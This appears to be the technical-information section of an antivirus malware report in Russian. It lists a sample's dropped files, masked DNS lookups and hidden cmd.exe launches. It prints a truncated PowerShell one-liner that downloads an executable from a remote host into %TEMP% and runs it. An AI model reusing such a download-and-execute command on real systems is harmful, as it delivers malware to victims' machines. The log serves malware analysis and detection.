Техническая информация
- $vixrhxpr как %temp%\pnxgwczudh.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Umfzdqigldp([String] $vixrhxpr){(New-Object System.Net.WebClient).DownloadFile($vixrhxpr,''%TEMP%\Pnxgwczudh.exe'');Start-Process ''%TEMP%\Pnxgwczudh.exe''...
- %TEMP%\nmgc.bat
- 'ba###teks.com':80
- http://ba###teks.com/kperotac.bin
- DNS ASK ch####hinenow.com
- DNS ASK ba###teks.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Umfzdqigldp([String] $vixrhxpr){(New-Object System.Net.WebClient).DownloadFile($vixrhxpr,''%TEMP%\Pnxgwczudh.exe'');Start-Process ''%TEMP%\Pnxgwczudh.exe''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Nmgc.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Nmgc.bat" "